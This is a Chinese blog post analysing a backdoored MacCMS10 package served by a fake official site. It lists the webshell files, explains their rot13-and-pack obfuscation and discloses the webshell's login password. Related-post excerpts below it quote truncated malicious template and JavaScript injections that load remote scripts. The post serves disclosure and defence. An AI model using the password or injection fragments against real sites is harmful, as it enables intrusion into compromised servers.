MacCms10潜藏后门分析

最新推荐文章于 2025-05-18 09:02:34 发布
最新推荐文章于 2025-05-18 09:02:34 发布
阅读量7.4k 收藏 4
点赞数 3
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/102566055

影响范围

MacCMS 10

漏洞危害

潜藏后门

攻击类型

潜藏后门

利用条件

在影响范围内的MacCMS

CVE编号

漏洞概述

苹果CMS程序是一套采用PHP+MYSQL环境下运行的完善而强大的快速建站系统。具有程序体积小、运行速度快等特征,只要普通的虚拟主机就可以完美搭建起来,建站成本非常低。而且仿MVC模板分离,内置标签,自定义函数标签接口,强大的自定义采集功能,只要你会HTML就可以轻松做出个性化的网站。 

今天Tools上有人曝出有一个冒出了苹果CMS官网的网站提供的MacCMS10存在后门,所有下载该CMS并使用的用户都被植入了木马程序,本篇文章对此进行简要分析。

漏洞分析

首先去冒充的“苹果官网”下载MacCMS10版本(http://www.maccmsv10.com/download.html):

之后将其解压缩到PHPstudy的www目录下面同时使用D盾进行一次查杀:

从上面的查杀结果中发现有两个可疑的php文件:
c:\phpstudy\www\maccms10\extend\qcloud\sms\sms.php
c:\phpstudy\www\maccms10\extend\upyun\src\upyun\api\format.php

下面打开第一个进行简单分析:

从上面的逻辑来看在L18这里调用s函数,在s函数中先定义了一个str变量并且赋了一个超长的字符串,之后在L10行对该字符串进行了rot13解码,之后在将其作为变量传递给m函数,这里先来print一下11看看

之后浏览器中访问看看,输出为一串类似于16进制的字符串

之后我们继续分析,str传入m函数之后,之后带入pack中,经过百度查询发现pack函数的作用是将一个数据装入一个二进制字符串,第一个参数说明编码格式,和要装载的数量,第二个参数为要装载数据:https://www.runoob.com/php/func-misc-pack.html#

运行实例如:

下面我们将其输出看看:

之后在浏览器中访问看看,发现有很多的木马的特征:

之后对木马的密码使用了md5加密解密一下获得木马的登陆密码:

密码为:WorldFilledWithLove,之后我们直接访问该木马来看看

之后我们再来看第二个木马程序:

和第一个一样一样的,这里就不在一一分析了,直接连接一波看看:

安全建议

建议广大用户访问正确的苹果CMS官网下载CMS产品并安装,同时使用D盾等来查杀网站中的各个文件夹下的文件,查杀木马程序避免被其他用户通过该途径入侵留下更加隐蔽的后门程序等~

苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致
jun2016425的博客
10-30 1万+
最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的. 被挂马表现: 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js 苹果cms后台某处或者采集的资源打印奇怪的字符比如 {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuan.
maccms V10后门
weixin_30415113的博客
09-27 1917
前言 苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱.... 好吧,我还是直说吧,了解该cms的人都知道,很多huangwang喜欢用这套cms。而我国马上七十周年了,作为祖国的花骨朵儿、党未来的接班人,我觉得我有必要为祖国做一些力所能及的事情,于是决定审计下该套系统然后xxoo...
苹果cms最新漏洞被挂马跳转劫持及清除代码
sexrenge的博客
09-03 7201
网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x
苹果CMS V10 完整建站系统安装教程与实战
最新发布
weixin_29443363的博客
05-18 715
在信息技术迅猛发展的今天,内容管理系统(CMS)已成为网站建设和维护不可或缺的工具之一。苹果CMS V10,作为一款新兴的PHP开源CMS系统,凭借其独特的功能和简洁的界面设计,赢得了许多企业和个人用户的青睐。苹果CMS V10提供了丰富的模块和主题,可以轻松定制个性化的视频网站,满足从个人爱好者到专业视频内容提供商的需求。在详细介绍苹果CMS V10之前,让我们先了解其核心特点:高效的内容管理。
苹果CMS:通用清理后门排查
一些平时在开发过程中遇到的常见问题,分享给大家
05-21 1071
小白通用清理php后门排查办法
苹果cmsv10 小白通用清理php后门办法 简单易懂
g1655986984的博客
05-08 3586
注意:为了安全起见 每次发现被挂马后应该用以下方法来处理!!! 黑客入侵后可能在数据库挂js,可能在网站目录任何角落留下php后门,用以下方法可以快速清理干净php后门,不用一个一个文件去分析。 1,备份原网站配置文件 \application\database.php \application\route.php \application\extra\maccms.php \application\extra\bind.php \application\extra\timming.php \applica
maccms10.zip
01-07
苹果cmsv10安装包,已解压到一个压缩文件里面去了,可以直接上传到根目录即可。 苹果cmsv10安装包,已解压到一个压缩文件里面去了,可以直接上传到根目录即可。 苹果cmsv10安装包,已解压到一个压缩文件里面去了,可以直接上传到根目录即可。
maccms-v10最新版本,无后门无马,可查询
08-06
网站程序还得用安全高的没有后门的。
maccms10-master_maccms_maccms官网_maccms10_苹果_nan_
10-04
Maccms10-Master】是一个针对苹果设备和苹果官网的特定版本,它在苹果官网关闭后继续提供服务。这个版本已经更新到了2020年1月3日,这意味着它包含了截至那个日期的所有最新功能和修复。Maccms是内容管理系统(CMS...
苹果cms10源码_maccms10.zip
08-27
苹果cms10源码_maccms10
maccms10_苹果CMS10源码_
10-03
苹果CMSv10程序是一套采用PHP+MYSQL环境下运行的完善而强大的快速视频建站开源系统。是国内优秀的开源PHP视频建站系统
Maccmsv10程序.rar
05-24
MaccmsV10是目前最新的版本,也是最后的版本,原因想必大家都知道,因为涉及到版权问题就不在过多介绍,提供程序只为了纪念作者!
苹果cms10仿优酷模板源码喜欢的赶紧下载去吧免费分享
11-15
苹果cms10仿优酷模板源码喜欢的赶紧下载去吧免费分享
苹果cms10+海螺模板m3.1全解密无后门
10-19
苹果cms10+海螺模板m3.1全解密无后门
maccms10_其他程序数据转换插件_maccms10_
09-29
MacCMS10其他程序数据转换插件详解》 在当今互联网内容管理系统(CMS)繁多的环境下,不同平台之间的数据迁移与转换成为了许多网站管理员头疼的问题。针对这一需求,"MacCMS10其他程序数据转换插件"应运而生,它...
2023 苹果cms v10大橙子主题模板v3.1.6 去后门授权版
11-20 202
vfed主题设置,/index.php/label/admin。– vfed采集资源,/index.php/label/union。– 后台快捷菜单配置添加。
搭建自己的电影网站 2 (安装MacCMS10
10-27 1621
最终,笔者通过查找php.ini文件,发现php.ini文件(该文件并在maccms10文件夹中,而是在phpstudy的php插件文件夹中,本例中使用的php版本为7.4,因此我们需要在路径D:\phpstudy_pro\Extensions\php\php7.4.3nts中寻找php.ini文件)的值显示需要一个tmp文件夹,因此我们需要依照该命令,创建一个tmp文件夹,并赋予其对应权限,才能彻底解决无法登录maccms10后台的问题。最后点击选项卡下方的“确认”按钮,完成对文件夹的赋权。
三步建立自己的电影网站 1 (安装MacCMS10
11-05 2849
久而久之,赵先生萌发了自建一个电影网站的想法,说干就干,赵先生在网上搜索一圈,决定以Cpolar+MacCMS10的方案搭建自己的电影网站,不仅方便自己平时的观影需求,也能与好友们分享。接着,打开PHPStudy软件在主界面的“软件管理”页面,安装一系列电影网站所需的支持软件,包括php、Nginx、MySQL、SQL-front、FileZilla等,支持软件安装完成后,就可以正式进入MacCMS10的运行环境设置。最后,通过刚创建好的网页运行环境打开MacCMS10,正式进入电影网页的安装程序
搭建影视网站的MacCMS10模板整合
资源摘要信息: "苹果10模板.zip" 是一个包含多个网站模板的压缩包,这些模板旨在为使用MacCMS10内容管理系统(CMS)的用户所设计。MacCMS10是一个开源的内容管理系统,专门针对影视网站而开发,也支持其他类型网站如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值